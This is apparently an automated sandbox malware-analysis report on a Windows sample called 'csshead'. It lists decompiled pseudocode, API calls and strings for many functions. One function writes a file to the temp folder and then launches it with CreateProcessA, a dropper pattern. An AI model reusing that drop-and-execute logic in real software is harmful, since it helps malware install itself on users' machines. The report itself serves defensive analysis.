Part of subcall function 00401810: MultiByteToWideChar.KERNEL32(00000001,00000000,00000003,000000FF,?,00000001,00000001,00401D0B,?,?,00000001,00000003), ref: 00401835

Part of subcall function 00410680: 80000006.COMCTL32(00000000), ref: 00410749
Part of subcall function 00410680: 80000002.OLEAUT32(?), ref: 00410778

GetWindowLongA.USER32(?,000000EC), ref: 00417F10
GetWindowLongA.USER32(?,000000EC), ref: 00417F23
SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
OleUninitialize.OLE32 ref: 00417F51
OleInitialize.OLE32(00000000), ref: 00417F5E
GetWindowTextLengthA.USER32(?), ref: 00417F68
GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
GlobalLock.KERNEL32(00000000), ref: 00417FF7
GlobalUnlock.KERNEL32(00000000), ref: 00418012
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0041801F
lstrlenA.KERNEL32(00000000), ref: 00418031
SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
DefWindowProcA.USER32(?,?,?,?), ref: 00418176

Strings

(XC, xrefs: 00417EC1

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0041EA50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85

APIs

SetWindowLongA.USER32(?,000000F0,00000000), ref: 0041EABB
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000003F), ref: 0041EAD1
CreateWindowExA.USER32(00000200,004367A0,00000000,56000001,00000000,00000000,00000001,00000001,?,?,00442B90, 4C), ref: 0041EB01
BringWindowToTop.USER32(00000000), ref: 0041EB18

Part of subcall function 00418B30: GetClientRect.USER32 ref: 00418B55
Part of subcall function 00418B30: SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000014), ref: 00418B90

Strings

4C, xrefs: 0041EAE1, 0041EAE5

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041F040, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83

APIs

GetCurrentProcess.KERNEL32 ref: 0041F076
FlushInstructionCache.KERNEL32(00000000,?,?,00000000), ref: 0041F07D
CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 0041F113

Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C

SetLastError.KERNEL32(0000000E,?,00421617,?,?,?,?,?,?,?,?,00000000), ref: 0041F097

Strings

`+D, xrefs: 0041F0AA

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004082F4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82
processsleep

C-Code - Quality: 100%

			E004082F4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v541;
				char _v1054;
				struct _STARTUPINFOA _v1124;
				struct _PROCESS_INFORMATION _v1140;
				intOrPtr* _t36;
				intOrPtr _t42;
				intOrPtr _t58;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr _t78;

				_t36 = __eax -  *__eax;
				 *_t36 =  *_t36 + _t36;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = _t36;
				_v20 = 0;
				_v24 = E00407CFC(_v12);
				E00401258( &_v1124, 0x44);
				_v1124.cb = 0x44;
				if(_v24 == 0) {
					_t42 =  *0x40a168; // 0x401dec
					E00407290(_t42);
				} else {
					_v28 = E00401110(_v8, 0x408494);
					_t102 = _v28;
					if(_v28 != 0) {
						GetTempPathA(0x201,  &_v1054);
						E00407560( &_v1054, 0x408494, _t102);
						E00401308( &_v541, 0x40849c);
						E0040133C( &_v541,  &_v1054);
						E0040133C( &_v541, 0x40849c);
						_t58 =  *0x40a0a8; // 0x401c4c
						E0040133C( &_v541, _t58);
						if( *((char*)(_v28 + 4)) != 0x31) {
							 *0x40b514 = 0;
							_t63 =  *0x40b510; // 0x0
							E00401828(_t63);
							E004013B4(0x40b510, _v16);
							_t67 =  *0x40b510; // 0x0
							E004012B8(_t67, _v16, _v12);
							 *0x40b514 = _v16;
							 *0x40be1c = 0;
							wsprintfA("1530474054", 0x4084a0, _v24);
						} else {
							E0040485C( &_v1054, _v16, _v12);
							Sleep(0x5dc);
							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
								_t78 =  *0x40a174; // 0x401e10
								E00407290(_t78);
							} else {
								_v20 = 0xffffffff;
							}
						}
					}
				}
				return _v20;
			}

0x004082f4
0x004082f6
0x00408301
0x00408304
0x00408307
0x0040830c
0x00408317
0x00408325
0x0040832a
0x00408338
0x00408481
0x00408486
0x0040833e
0x0040834b
0x0040834e
0x00408352
0x00408364
0x00408370
0x00408380
0x00408393
0x004083a7
0x004083af
0x004083bc
0x004083cb
0x0040842d
0x00408432
0x00408437
0x00408444
0x0040844f
0x00408454
0x0040845c
0x00408461
0x00408476
0x004083cd
0x004083d9
0x004083e3
0x00408414
0x0040841f
0x00408424
0x00408416
0x00408416
0x00408416
0x00408414
0x004083cb
0x00408352
0x00408491

APIs

Part of subcall function 00407290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 004072AC
Part of subcall function 00407290: CloseHandle.KERNEL32(?), ref: 004072B9

Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD

GetTempPathA.KERNEL32(00000201,?), ref: 00408364
wsprintfA.USER32 ref: 00408476

Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE

Sleep.KERNEL32(000005DC), ref: 004083E3
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C

Strings

D, xrefs: 0040832A
>UD , xrefs: 0040833E

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004062C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71
library

C-Code - Quality: 68%

			E004062C0(struct HINSTANCE__* _a4, char _a8) {
				intOrPtr _v0;
				char _v4;
				void* _v8;
				intOrPtr _v20;
				intOrPtr* _v36;
				intOrPtr* _t24;
				intOrPtr* _t29;
				_Unknown_base(*)()* _t32;
				intOrPtr* _t34;
				struct HINSTANCE__* _t37;
				intOrPtr _t41;
				void* _t51;

				_v4 = 0;
				_v8 = 0;
				_t51 = E00405CB0(_a4, _a8,  &_v4,  &_v8);
				if(_t51 >= 0) {
					_t29 = _v8;
					_t51 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x1c))))(_t29,  &_a8);
					if(_t51 >= 0) {
						if( *0x442a2c != 1) {
							L5:
							_t32 =  *0x4332e4;
						} else {
							_t37 = GetModuleHandleW(L"OLEAUT32.DLL");
							if(_t37 == 0) {
								goto L5;
							} else {
								_t32 = GetProcAddress(_t37, "UnRegisterTypeLibForUser");
								if(_t32 == 0) {
									goto L5;
								}
							}
						}
						_t41 = _v0;
						_t51 =  *_t32(_t41,  *(_t41 + 0x18) & 0x0000ffff,  *(_t41 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_t41 + 0x10)),  *((intOrPtr*)(_t41 + 0x14)));
						_t34 = _v36;
						 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x30))))(_t34, _v20);
					}
				}
				_t24 = _v8;
				if(_t24 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t24 + 8))))(_t24);
				}
				 *0x433310(_v4);
				return _t51;
			}

0x004062d8
0x004062e0
0x004062ed
0x004062f1
0x004062f3
0x00406304
0x00406308
0x00406311
0x00406332
0x00406332
0x00406313
0x00406318
0x00406320
0x00000000
0x00406322
0x00406328
0x00406330
0x00000000
0x00000000
0x00406330
0x00406320
0x00406337
0x00406354
0x00406356
0x00406361
0x00406361
0x00406308
0x00406363
0x00406369
0x00406371
0x00406371
0x00406378
0x00406384

APIs

Part of subcall function 00405CB0: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00405CF5
Part of subcall function 00405CB0: lstrlenW.KERNEL32(?), ref: 00405D61
Part of subcall function 00405CB0: lstrlenA.KERNEL32(00000000,00000000,?,?,00000003,?), ref: 00405DD7
Part of subcall function 00405CB0: lstrlenA.KERNEL32(?), ref: 00405E13
Part of subcall function 00405CB0: 800000A1.OLEAUT32(00000000,?,00000000,?,?,00000003,?), ref: 00405E99
Part of subcall function 00405CB0: lstrlenA.KERNEL32(?), ref: 00405EE9
Part of subcall function 00405CB0: 800000A1.OLEAUT32(00000000,?,00000000,?,?,00000003,?), ref: 00405F57
Part of subcall function 00405CB0: 80000002.OLEAUT32(00000000), ref: 00405F64

GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00406318
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00406328
80000006.COMCTL32(?), ref: 00406378

Strings

UnRegisterTypeLibForUser, xrefs: 00406322
OLEAUT32.DLL, xrefs: 00406313

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00412950, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66

APIs

GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19

Strings

0, xrefs: 0041298A
,, xrefs: 004129C6
Z, xrefs: 004129BF

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041FD50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
string

C-Code - Quality: 29%

			E0041FD50(intOrPtr* __ecx, intOrPtr _a4) {
				char _v516;
				void* _t13;
				intOrPtr _t17;
				intOrPtr* _t31;
				char* _t32;

				_t32 =  &_v516;
				_t31 = __ecx;
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x14))))();
				if(_a4 != 0) {
					if(_t13 != 0) {
						_push( *((intOrPtr*)(L00402440(_t13))));
						_push( &_v516);
					} else {
						_push( *((intOrPtr*)(__ecx + 0xc)));
						_push( &_v516);
					}
					lstrcpyA();
					_t17 =  *((intOrPtr*)(_t31 + 8));
					if(_t17 > 0) {
						_push(_t17);
						wsprintfA( &(_t32[lstrlenA( &_v516) + 0xc]), ":%d");
					}
					return SetWindowTextA( *(_t31 - 0x38),  &_v516);
				}
				return _t13;
			}

0x0041fd50
0x0041fd57
0x0041fd5e
0x0041fd68
0x0041fd6c
0x0041fd82
0x0041fd87
0x0041fd6e
0x0041fd71
0x0041fd76
0x0041fd76
0x0041fd88
0x0041fd8e
0x0041fd93
0x0041fd95
0x0041fdab
0x0041fdb1
0x00000000
0x0041fdbd
0x0041fdca

APIs

lstrcpyA.KERNEL32(?), ref: 0041FD88
lstrlenA.KERNEL32(?,:%d,?), ref: 0041FDA0
wsprintfA.USER32 ref: 0041FDAB
SetWindowTextA.USER32(?,?), ref: 0041FDBD

Strings

:%d, xrefs: 0041FD96

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00410AE0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36
library

C-Code - Quality: 64%

			E00410AE0(CHAR* _a4, intOrPtr _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;
				signed int _t12;
				struct HINSTANCE__* _t16;
				intOrPtr _t20;

				_t16 = LoadLibraryA(_a4);
				if(_t16 != 0) {
					_t20 = _a8;
					if(_t20 == 0) {
						L00401230(0x80004005);
					}
					_t5 = GetProcAddress(_t16, "DllGetVersion");
					if(_t5 != 0) {
						_t6 =  *_t5(_t20);
						FreeLibrary(_t16);
						return _t6;
					} else {
						FreeLibrary(_t16);
						return 0x80004001;
					}
				} else {
					_t12 =  *0x433268();
					if(_t12 > 0) {
						return _t12 & 0x0000ffff | 0x80070000;
					}
					return _t12;
				}
			}

0x00410aec
0x00410af0
0x00410af9
0x00410aff
0x00410b06
0x00410b06
0x00410b11
0x00410b19
0x00410b2d
0x00410b32
0x00410b3c
0x00410b1b
0x00410b21
0x00410b2b
0x00410b2b
0x00410af2
0x00403aa0
0x00403aa8
0x00000000
0x00403aaf
0x00403ab4
0x00403ab4

APIs

LoadLibraryA.KERNEL32(?), ref: 00410AE6
FreeLibrary.KERNEL32(00000000), ref: 00410B32

Part of subcall function 00401230: RaiseException.KERNEL32(-C006C020,00000001,00000000,00000000,0040807F,80004005), ref: 0040124C

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00410B11
FreeLibrary.KERNEL32(00000000), ref: 00410B21

Strings

DllGetVersion, xrefs: 00410B0B

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00412570, Relevance: 7.6, APIs: 5, Instructions: 150library

APIs

GetParent.USER32(?), ref: 0041257F
GetVersionExA.KERNEL32(?), ref: 004125DF
LoadLibraryA.KERNEL32(00436280), ref: 0041261A
GetProcAddress.KERNEL32(00000000,00436270), ref: 00412633
FreeLibrary.KERNEL32(00000000), ref: 0041264E

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042580D, Relevance: 7.6, APIs: 5, Instructions: 116

C-Code - Quality: 96%

			E0042580D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t47;
				signed int _t52;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				long _t64;
				LONG* _t67;
				LONG* _t73;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				void* _t101;

				_t101 = __eflags;
				_t87 = __edx;
				_push(0x14);
				_push(0x43cdd8);
				L00429EF0(__ebx, __edi, __esi);
				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
				_t89 = L00425EEB(__ebx, __edx, _t101);
				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
				L00425504(__ebx, __edx, _t89, __esi, _t101, __fp0);
				_t47 = L004255A8( *((intOrPtr*)(_t98 + 8)));
				 *((intOrPtr*)(_t98 + 8)) = _t47;
				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
					_t41 = _t98 - 0x20;
					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
					__eflags =  *_t41;
					L26:
					return L00429F35( *(_t98 - 0x20));
				}
				_t73 = E0042A0DF(0x220);
				_t103 = _t73;
				if(_t73 == 0) {
					goto L26;
				}
				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
				 *_t73 =  *_t73 & 0x00000000;
				_t52 = L00425624(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
				 *(_t98 - 0x20) = _t52;
				if(_t52 != 0) {
					__eflags = _t52 - 0xffffffff;
					if(_t52 == 0xffffffff) {
						__eflags = _t73 - 0x4418d8;
						if(__eflags != 0) {
							E00422804(_t73);
						}
						 *((intOrPtr*)(L004251B8(__eflags))) = 0x16;
					}
				} else {
					_t97 =  *((intOrPtr*)(_t98 - 0x24));
					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
						_t69 =  *(_t97 + 0x68);
						if( *(_t97 + 0x68) != 0x4418d8) {
							E00422804(_t69);
						}
					}
					 *(_t97 + 0x68) = _t73;
					_t93 =  *0x433280;
					InterlockedIncrement(_t73);
					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x441df8 & 0x00000001) == 0) {
						L0042C08B(_t73, _t93, 0xd);
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						 *0x442c5c = _t73[1];
						 *0x442c60 = _t73[2];
						 *0x442c64 = _t73[3];
						_t61 = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t61;
							if(_t61 >= 5) {
								break;
							}
							 *((short*)(0x442c50 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
							_t61 = _t61 + 1;
						}
						_t62 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t62;
							__eflags = _t62 - 0x101;
							if(_t62 >= 0x101) {
								break;
							}
							 *((char*)(_t62 + 0x441af8)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
							_t62 = _t62 + 1;
						}
						_t63 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t63;
							__eflags = _t63 - 0x100;
							if(_t63 >= 0x100) {
								break;
							}
							 *((char*)(_t63 + 0x441c00)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
							_t63 = _t63 + 1;
						}
						_t64 = InterlockedDecrement( *0x441d00);
						__eflags = _t64;
						if(_t64 == 0) {
							_t67 =  *0x441d00; // 0x4418d8
							__eflags = _t67 - 0x4418d8;
							if(_t67 != 0x4418d8) {
								E00422804(_t67);
							}
						}
						 *0x441d00 = _t73;
						InterlockedIncrement(_t73);
						 *(_t98 - 4) = 0xfffffffe;
						E0042596E();
					}
				}
			}

0x0042580d
0x0042580d
0x0042580d
0x0042580f
0x00425814
0x00425819
0x00425822
0x00425824
0x00425827
0x00425832
0x00425837
0x0042583d
0x0042599a
0x0042599a
0x0042599a
0x0042599e
0x004259a6
0x004259a6
0x0042584e
0x00425850
0x00425852
0x00000000
0x00000000
0x00425862
0x00425864
0x0042586b
0x00425872
0x00425877
0x00425979
0x0042597c
0x0042597e
0x00425984
0x00425987
0x0042598c
0x00425992
0x00425992
0x0042587d
0x0042587d
0x0042588b
0x0042588d
0x00425895
0x00425898
0x0042589d
0x00425895
0x0042589e
0x004258a2
0x004258a8
0x004258ae
0x004258c3
0x004258c9
0x004258d0
0x004258d8
0x004258e0
0x004258e5
0x004258e7
0x004258e7
0x004258ed
0x00000000
0x00000000
0x004258f4
0x004258fc
0x004258fc
0x004258ff
0x004258ff
0x00425901
0x00425901
0x00425904
0x00425909
0x00000000
0x00000000
0x0042590f
0x00425915
0x00425915
0x00425918
0x00425918
0x0042591a
0x0042591a
0x0042591d
0x00425922
0x00000000
0x00000000
0x0042592b
0x00425931
0x00425931
0x0042593a
0x00425940
0x00425942
0x00425944
0x00425949
0x0042594e
0x00425951
0x00425956
0x0042594e
0x00425957
0x0042595e
0x00425960
0x00425967
0x00425967
0x004258ae

APIs

__getptd.LIBCMT ref: 0042581D

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

Part of subcall function 00425504: __getptd.LIBCMT ref: 00425510
Part of subcall function 00425504: __amsg_exit.LIBCMT ref: 00425530
Part of subcall function 00425504: InterlockedDecrement.KERNEL32(?), ref: 0042555D
Part of subcall function 00425504: InterlockedIncrement.KERNEL32(004418D8), ref: 00425588

Part of subcall function 004255A8: GetOEMCP.KERNEL32(00000000), ref: 004255D1
Part of subcall function 004255A8: GetACP.KERNEL32(00000000), ref: 004255F4

Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100

Part of subcall function 00425624: setSBCS.LIBCMT ref: 00425651
Part of subcall function 00425624: IsValidCodePage.KERNEL32(-00000030), ref: 00425697
Part of subcall function 00425624: GetCPInfo.KERNEL32(00000000,?), ref: 004256AA
Part of subcall function 00425624: setSBUpLow.LIBCMT ref: 00425798

InterlockedDecrement.KERNEL32(?), ref: 00425883
InterlockedIncrement.KERNEL32(00000000), ref: 004258A8

Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
Part of subcall function 0042C08B: EnterCriticalSection.KERNEL32(?,?,?,00425E08,0000000D), ref: 0042C0B5

InterlockedDecrement.KERNEL32 ref: 0042593A
InterlockedIncrement.KERNEL32(00000000), ref: 0042595E

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00419220, Relevance: 7.6, APIs: 5, Instructions: 100windowstring

APIs

GetMenuItemCount.USER32(?), ref: 0041922F
GetMenuStringA.USER32(?,-00000002,00000000,00000000,00000400), ref: 00419258
GetMenuStringA.USER32(?,-00000002,?,00000001,00000400), ref: 004192C6
lstrcmp.KERNEL32(?,004363E8), ref: 004192E4
GetSubMenu.USER32(?,?), ref: 00419317

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00411F60, Relevance: 7.6, APIs: 5, Instructions: 98window

APIs

GetWindowRect.USER32(?,?), ref: 00411FAE

Part of subcall function 004112B0: SetRect.USER32(?,?,?,?,?), ref: 00411304
Part of subcall function 004112B0: SetRect.USER32(00000000,?,?,?,?), ref: 00411320

Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382

PtInRect.USER32(?), ref: 00412035
GetSystemMenu.USER32(?,00000000), ref: 0041204A
GetMenuDefaultItem.USER32(00000000,00000000,00000000), ref: 00412055
SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00412074

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041D5C9, Relevance: 7.6, APIs: 5, Instructions: 97
comwindowstring

C-Code - Quality: 64%

			E0041D5C9(intOrPtr __ebx, signed int __edi, signed short __esi, signed int __ebp, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr* _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40, char _a44, CHAR* _a48, intOrPtr _a52, struct tagRECT _a56, intOrPtr _a60, intOrPtr* _a64, intOrPtr _a68, intOrPtr _a76, char _a80, intOrPtr* _a84, intOrPtr _a92, intOrPtr _a100, struct HMENU__* _a104, signed int _a108, char _a124, char _a131, intOrPtr _a132, intOrPtr _a136, char _a139, _Unknown_base(*)()* _a144, intOrPtr _a176, char _a180, struct tagPOINT _a192, intOrPtr _a196, char _a200, char _a208, char _a220, struct tagMENUITEMINFOA _a224, int _a228, int _a232, int _a236, int _a240, int _a244, struct tagPAINTSTRUCT _a348, struct tagRECT _a356, char _a940, CHAR* _a2236, intOrPtr _a2240, intOrPtr _a2244) {
				intOrPtr* _v4;
				char _v16;
				intOrPtr* _v20;
				intOrPtr* _v28;
				intOrPtr* _v48;
				intOrPtr* _v52;
				CHAR* _v60;
				intOrPtr* _v64;
				intOrPtr _v80;
				intOrPtr _t143;
				CHAR* _t150;
				void* _t163;
				long _t165;
				void* _t169;
				CHAR* _t171;
				CHAR* _t174;
				CHAR* _t177;
				CHAR* _t178;
				CHAR* _t184;
				intOrPtr* _t185;
				CHAR* _t187;
				intOrPtr* _t188;
				CHAR* _t190;
				CHAR* _t192;
				intOrPtr* _t193;
				intOrPtr* _t195;
				intOrPtr* _t197;
				int _t200;
				struct HWND__* _t201;
				intOrPtr* _t210;
				CHAR* _t211;
				CHAR* _t212;
				CHAR* _t213;
				CHAR* _t217;
				intOrPtr* _t218;
				CHAR* _t220;
				intOrPtr* _t221;
				intOrPtr* _t223;
				CHAR* _t224;
				intOrPtr* _t225;
				intOrPtr* _t227;
				intOrPtr* _t230;
				intOrPtr* _t232;
				intOrPtr* _t235;
				intOrPtr _t251;
				intOrPtr _t253;
				void* _t255;
				struct HMENU__* _t256;
				CHAR* _t258;
				char _t260;
				intOrPtr _t301;
				CHAR* _t303;
				signed int _t339;
				int _t340;
				intOrPtr* _t343;
				signed short _t345;
				intOrPtr _t346;
				struct HWND__* _t348;
				CHAR* _t349;
				void* _t350;
				intOrPtr* _t352;
				CHAR* _t353;
				signed int _t356;
				intOrPtr* _t360;
				void* _t361;
				void* _t362;
				void* _t363;

				_t356 = __ebp;
				_t345 = __esi;
				_t339 = __edi;
				_t253 = __ebx;
				while(1) {
					L4:
					 *0x442a98 =  *0x442a98 + DragQueryFileA(0, 0xffffffff,  &_a940, 0x104);
					_t258 =  *0x442aa0; // 0x0
					if(_t339 /  &(_t258[0x61]) * _t356 != 0) {
						_t301 =  *0x442aa4; // 0x0
						asm("cdq");
						_t339 = (_t345 & 0x0000ffff) / (_t301 + 0x44);
					}
					_t255 = _t255 - 1;
					if(_t255 != 0) {
						continue;
					}
					L7:
					_t143 = _a196;
					_t260 = _a200;
					if(_a36 != _t143 || _a40 != _t260) {
						_a132 = _a132 + 1;
						_a36 = _t143;
						_a40 = _t260;
					}
					if(_a180 != 0) {
						_t28 =  &_a180;
						 *_t28 = _a180 - _a192.x;
						__eflags =  *_t28;
					} else {
						_a92 = _a92 + ( *0x442aa8 & 0x0000ffff);
					}
					_t346 = _a132;
					if(_t346 != 0) {
						_a24 = _a24 + 1;
						_push( &_a124);
						_push(0);
						L00432D08();
					}
					if(_t346 > 1 || _a24 > 4) {
						L21:
						_t256 = _a104;
						 *0x442a94 =  *0x442a94 + (0x38e38e39 * _a108 >> 0x20 >> 3 >> 0x1f) + (0x38e38e39 * _a108 >> 0x20 >> 3) - ( *0x442aa8 & 0x000000ff) -  *0x442aac + _a52 + _a192.x;
						EnableMenuItem(_t256, 0xc, 0);
						__eflags = _a2236;
						if(_a2236 == 0) {
							_a52 = 0;
							_a136 = 0;
							_a80 = 0;
							_a132 = 0;
							_a24 = 0;
							 *0x433608(0, 2);
							_t352 =  *0x433604;
							_t184 =  *_t352(0x433ffc, 0, 1, 0x43a508,  &_a44);
							_t343 =  *0x4335b8;
							__eflags = _t184;
							if(_t184 < 0) {
								 *_t343();
							}
							_t185 = _a24;
